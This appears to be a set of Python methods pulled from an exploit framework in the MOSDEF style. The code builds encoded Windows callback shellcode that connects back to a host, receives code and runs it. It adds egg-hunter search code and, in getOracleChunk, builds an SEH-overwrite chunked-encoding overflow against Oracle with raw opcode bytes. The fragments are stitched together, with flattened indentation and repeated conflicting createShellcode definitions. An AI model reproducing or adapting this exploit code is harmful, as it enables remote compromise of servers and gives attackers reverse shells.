def createShellcode(self):
localhost = self.callback.ip
localport = self.callback.port
from shellcode import shellcodeGenerator
sc = shellcodeGenerator.win32()
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {"port": localport, "ipaddress": localhost})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF
self.shellcode = sc.get()
from encoder import chunkedaddencoder
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
self.log("Encoding shellcode")
self.shellcode = encoder.encode(self.shellcode)
if self.shellcode == "":
self.log("Problem encoding shellcode")
return 0
self.shellcode = self.tag2 + self.tag1 + self.shellcode
from shellcode import win32shell
self.searchcode = win32shell.getsearchcode(self.tag1, self.tag2)
from encoder import addencoder
encoder = addencoder.inteladdencoder()
encoder.setbadstring(self.searchbadstring)
self.encodedsearchcode = encoder.encode(self.searchcode)
if not self.encodedsearchcode:
return None
self.log(
"Length of search shellcode: %d, length of real shellcode: %d\n" %
(len(self.searchcode), len(self.shellcode)))
return 1
def createWin32SearchShellcodeNibble(self,
localhost,
localport,
rawshellcode=None):
"""
Creates a mosdef search shellcode encoded with nibble_encoder.py
"""
#print "Calling back to %s:%s"%(localhost,localport)
#print "Rawshellcode=%s"%rawshellcode
ret = self.createWin32Shellcode(self.badstring, localhost, localport,
rawshellcode)
if not ret:
return ret
#we're going to search for it, so we add tag1 and tag2 to the front.
#Tag2 must come before tag1!!!
self.shellcode = self.tag2 + self.tag1 + self.shellcode
self.searchcode = win32shell.getsearchcode(self.tag1, self.tag2)
encoder = nibble_encoder.intel_nibbleencoder()
encoder.setbadstring(self.searchbadstring)
self.encodedsearchcode = encoder.encode(self.searchcode)
if not self.encodedsearchcode:
return None
#self.searchcode=win32shell.getsearchcode(self.tag1,self.tag2)
self.log(
"Length of search shellcode: %d, length of real shellcode: %d\n" %
(len(self.searchcode), len(self.shellcode)))
#print prettyprint(self.encodedsearchcode)
for c in self.badstring:
if c in self.encodedsearchcode:
self.log("%s in encodedsearchcode. :<" % prettyprint(c))
self.log("%s" % prettyprint(self.encodedsearchcode))
return 1
def getOracleChunk(self, retadd, seoffset, align):
pad = 1
orachunk = ""
chunk = ""
self.log("Building Oracle specific chunk")
if pad:
chunk += "%X\r\n" % pad
chunk += "P" * pad
chunk += "\r\n"
diff = len(chunk)
chunk += "FFFFFFF4"
orachunk = "A" * (8192 - (8 + 2 + diff))
# mix in searchcode for our main payload
self.log("Building searchcode")
searchcode = win32shell.getsearchcode(self.tag1, self.tag2)
from encoder import addencoder
encoder = addencoder.inteladdencoder()
encoder.setbadstring(self.searchbadstring)
searchcode = encoder.encode(searchcode)
#searchcode = "\xcc" + searchcode
# mix it in the sauce
self.log("Adding searchcode")
orachunk = stroverwrite(orachunk, searchcode,
(((seoffset - 1) * 4) + align) -
len(searchcode))
# ebx points at the ptr to next SEH record that we own
# we abuse this by using a jmp ebx addy and putting a
# jmp in the SEH record ptr to jmp over the SE handler tag
# and into a jmp back to some search shellcode for our main
# payload
# ebx will point at SEH next ptr, we jmp over the SE handler tag
orachunk = stroverwrite(orachunk, "AA\xeb\x04",
((seoffset - 1) * 4) + align)
# the actual SE handler tag
orachunk = stroverwrite(orachunk, intel_order(retadd),
(seoffset * 4) + align)
# jmp to searchcode here (addl 0x600,%esp jmp %esp)
orachunk = stroverwrite(orachunk, "\x81\xc4\x00\x06\x00\x00\xff\xe4",
((seoffset + 1) * 4) + align)
"""
findme = 0x41424301
for i in range(0, 2044):
findme = self.sanitiseAdd(findme)
print "offset i: %d %.8X"% (i, findme)
orachunk = stroverwrite(orachunk, intel_order(findme), i * 4)
findme = findme + 1
"""
chunk += orachunk
return chunk
def createShellcode(self, localhost, localport):
self.log("Calling back to %s:%s" % (localhost, localport))
self.createWin32Shellcode(self.badstring, localhost, localport)
self.shellcode = self.tag2 + self.tag1 + self.shellcode
self.searchcode = win32shell.getsearchcode(self.tag1, self.tag2)
encoder = addencoder.inteladdencoder()
encoder.setbadstring(self.badstring)
#we need to solve a little problem with esp being
#in our string by subtracting from esp
SUBESP5000 = binstring("81 ec") + intel_order(5000)
self.searchcode = SUBESP5000 + self.searchcode
self.encodedsearchcode = encoder.encode(self.searchcode)
if not self.encodedsearchcode:
return None
self.log(
"Length of search shellcode: %d, length of real shellcode: %d\n" %
(len(self.searchcode), len(self.shellcode)))
#print prettyprint(self.encodedsearchcode)
return 1
def createShellcode(self):
if self.callback:
host = self.callback.ip
port = self.callback.port
encoder = alphanumeric.AlphaNum()
totopc = encoder.seh_pc()
getpc = encoder.get_pc(reg='ecx')
self.shellcode = self.createHeapSafeInject(self.badstring, host, port)
self.tag1 = "D2D2"
self.tag2 = "2D2D"
payload = encoder.encode(self.shellcode)
self.shellcode = totopc + getpc + payload
self.shellcode = self.tag2 + self.tag1 + self.shellcode
self.searchcode = win32shell.getsearchcode(self.tag1, self.tag2)
self.encodedsearchcode = self.intel_encode(self.searchbadstring,
self.searchcode)
payload = encoder.encode(self.encodedsearchcode)
self.encodedsearchcode = totopc + getpc + payload